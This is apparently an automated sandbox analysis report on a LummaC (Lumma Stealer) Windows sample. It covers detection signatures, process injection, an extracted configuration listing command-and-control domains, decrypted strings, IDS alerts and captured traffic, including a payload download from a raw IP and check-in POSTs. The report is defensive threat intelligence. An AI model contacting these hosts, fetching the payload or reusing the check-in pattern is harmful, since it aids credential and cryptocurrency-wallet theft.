Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AD3SI7tuzs.exe

Overview

General Information

Sample name:AD3SI7tuzs.exe
renamed because original name is a hash value
Original sample name:5ab9529b4ef0010efeadbca8251f1708cdca5a80750e0d4f842464369a342ed0.exe
Analysis ID:1515005
MD5:c9298899bde5efb635d28f14a6c62125
SHA1:d8962520ab3b97555a757cf1e1d84bb1450c81db
SHA256:5ab9529b4ef0010efeadbca8251f1708cdca5a80750e0d4f842464369a342ed0
Tags:exeuser-NDA0E
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • AD3SI7tuzs.exe (PID: 3356 cmdline: "C:\Users\user\Desktop\AD3SI7tuzs.exe" MD5: C9298899BDE5EFB635D28F14A6C62125)
    • RegAsm.exe (PID: 6660 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["evoliutwoqm.shop", "caffegclasiqwp.shop", "traineiwnqo.shop", "miracledzmnqwui.shop", "locatedblsoqp.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "millyscroqwp.shop", "stamppreewntnq.shop"], "Build id": "WpM2Co--TRAX"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:06.180806+020020546531A Network Trojan was detected192.168.2.549705188.114.97.3443TCP
    2024-09-21T15:15:09.430729+020020546531A Network Trojan was detected192.168.2.549707104.21.20.40443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:06.273590+020020554741A Network Trojan was detected192.168.2.5636781.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:06.213096+020020554751A Network Trojan was detected192.168.2.5597981.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:06.225372+020020554771A Network Trojan was detected192.168.2.5528561.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:06.188727+020020554791A Network Trojan was detected192.168.2.5639521.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:06.237314+020020554801A Network Trojan was detected192.168.2.5498671.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:06.248550+020020554811A Network Trojan was detected192.168.2.5568511.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:06.260773+020020554821A Network Trojan was detected192.168.2.5508021.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:06.201027+020020554831A Network Trojan was detected192.168.2.5614261.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:06.180806+020020498361A Network Trojan was detected192.168.2.549705188.114.97.3443TCP
    2024-09-21T15:15:09.430729+020020498361A Network Trojan was detected192.168.2.549707104.21.20.40443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:04.865477+020020553771Domain Observed Used for C2 Detected192.168.2.5553061.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-09-21T15:15:05.390590+020020553781Domain Observed Used for C2 Detected192.168.2.549705188.114.97.3443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: AD3SI7tuzs.exeAvira: detected
    Antivirus detection for URL or domain
    Source: locatedblsoqp.shopURL Reputation: Label: phishing
    Source: caffegclasiqwp.shopURL Reputation: Label: malware
    Source: condedqpwqm.shopURL Reputation: Label: phishing
    Source: millyscroqwp.shopURL Reputation: Label: malware
    Source: stamppreewntnq.shopURL Reputation: Label: phishing
    Source: stagedchheiqwo.shopURL Reputation: Label: phishing
    Source: traineiwnqo.shopURL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Source: https://caffegclasiqwp.shop/Avira URL Cloud: Label: malware
    Source: https://stagedchheiqwo.shop/apiAAvira URL Cloud: Label: phishing
    Source: https://caffegclasiqwp.shop/apiAvira URL Cloud: Label: malware
    Source: miracledzmnqwui.shopAvira URL Cloud: Label: phishing
    Source: https://stamppreewntnq.shop/Avira URL Cloud: Label: phishing
    Source: https://caffegclasiqwp.shop/apiB-Avira URL Cloud: Label: malware
    Source: https://stagedchheiqwo.shop/eAvira URL Cloud: Label: phishing
    Source: http://147.45.44.131/files/iy94.exeAvira URL Cloud: Label: malware
    Source: https://miracledzmnqwui.shop/?Avira URL Cloud: Label: phishing
    Source: https://stamppreewntnq.shop/apiAvira URL Cloud: Label: phishing
    Source: https://steppyplantnw.shop/apiAvira URL Cloud: Label: malware
    Source: https://miracledzmnqwui.shop/apiAvira URL Cloud: Label: malware
    Source: https://locatedblsoqp.shop/apiuAvira URL Cloud: Label: malware
    Found malware configuration
    Source: 2.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["evoliutwoqm.shop", "caffegclasiqwp.shop", "traineiwnqo.shop", "miracledzmnqwui.shop", "locatedblsoqp.shop", "stagedchheiqwo.shop", "condedqpwqm.shop", "millyscroqwp.shop", "stamppreewntnq.shop"], "Build id": "WpM2Co--TRAX"}
    Multi AV Scanner detection for submitted file
    Source: AD3SI7tuzs.exeReversingLabs: Detection: 63%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
    Machine Learning detection for sample
    Source: AD3SI7tuzs.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: caffegclasiqwp.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: stamppreewntnq.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: stagedchheiqwo.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: millyscroqwp.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: evoliutwoqm.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: condedqpwqm.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: traineiwnqo.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: locatedblsoqp.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: miracledzmnqwui.shop
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: lid=%s&j=%s&ver=4.0
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: TeslaBrowser/5.5
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: - Screen Resoluton:
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: - Physical Installed Memory:
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: Workgroup: -
    Source: 2.2.RegAsm.exe.400000.0.unpackString decryptor: WpM2Co--TRAX
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.20.40:443 -> 192.168.2.5:49707 version: TLS 1.2
    Source: AD3SI7tuzs.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\ConsoleApp66.pdb source: AD3SI7tuzs.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_00435872
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-14h]2_2_00434BE6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0040B550
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+02h], 0000h2_2_00415070
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_00415070
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esp], 00000000h2_2_00413810
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h2_2_00421037
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_0041B0B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-14h], esi2_2_0041D917
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h2_2_004211E3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h2_2_004211E3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ebx2_2_00407180
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [ebx]2_2_00438990
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, dword ptr [ebp-14h]2_2_00436990
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00436990
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp]2_2_00433A50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, dword ptr [ebp-14h]2_2_00436AE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00436AE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+000000A8h]2_2_00411AFA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+000000A8h]2_2_00411AFA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+000000A8h]2_2_00411AFA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_00436290
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_00419AB0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_0040F340
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+14h]2_2_00427379
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi], ecx2_2_00425300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00425300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al2_2_00425300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+34h]2_2_00425300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_00425300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+14h]2_2_00425300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edx], cx2_2_0041CB12
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00433B30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax2_2_0041F3E2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_0041F3E2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+14h]2_2_00412387
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_004224C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004304D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_004304E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, word ptr [ebp+eax*4+00h]2_2_00408CF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [ebp+ebx*4+00h]2_2_00408CF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_004214F6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]2_2_00403490
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00419D10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00419D10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ecx2_2_00414DD8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0041E590
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]2_2_0041E590
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]2_2_0042FDAE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+01h], 00000000h2_2_0040EE4A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_00410604
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_00410604
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0040C608
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]2_2_0042FDAE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]2_2_00431E90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, dword ptr [ebp-14h]2_2_00436EB0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax2_2_00436EB0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00421F00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_00433F00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0041E724
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+24h]2_2_0041E724
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_0040EF2C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_00435FC1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_004214F6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0042BFF0

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2055475 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop) : 192.168.2.5:59798 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055482 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop) : 192.168.2.5:50802 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055377 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (miracledzmnqwui .shop) : 192.168.2.5:55306 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055480 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop) : 192.168.2.5:49867 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.5:63952 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055481 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop) : 192.168.2.5:56851 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.5:61426 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055474 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop) : 192.168.2.5:63678 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2055378 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (miracledzmnqwui .shop in TLS SNI) : 192.168.2.5:49705 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2055477 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop) : 192.168.2.5:52856 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 104.21.20.40:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 104.21.20.40:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.97.3:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: evoliutwoqm.shop
    Source: Malware configuration extractorURLs: caffegclasiqwp.shop
    Source: Malware configuration extractorURLs: traineiwnqo.shop
    Source: Malware configuration extractorURLs: miracledzmnqwui.shop
    Source: Malware configuration extractorURLs: locatedblsoqp.shop
    Source: Malware configuration extractorURLs: stagedchheiqwo.shop
    Source: Malware configuration extractorURLs: condedqpwqm.shop
    Source: Malware configuration extractorURLs: millyscroqwp.shop
    Source: Malware configuration extractorURLs: stamppreewntnq.shop
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 21 Sep 2024 13:15:04 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 27 Aug 2024 16:54:28 GMTETag: "44c00-620ad183c5d5d"Accept-Ranges: bytesContent-Length: 281600Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 67 ed cc 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 80 03 00 00 c8 00 00 00 00 00 00 e0 9e 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 29 b4 03 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 04 00 c8 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b5 03 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c1 7f 03 00 00 10 00 00 00 80 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 28 00 00 00 90 03 00 00 2a 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 ef 00 00 00 c0 03 00 00 5a 00 00 00 ae 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 c8 43 00 00 00 b0 04 00 00 44 00 00 00 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /files/iy94.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: miracledzmnqwui.shop
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: steppyplantnw.shop
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
    Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
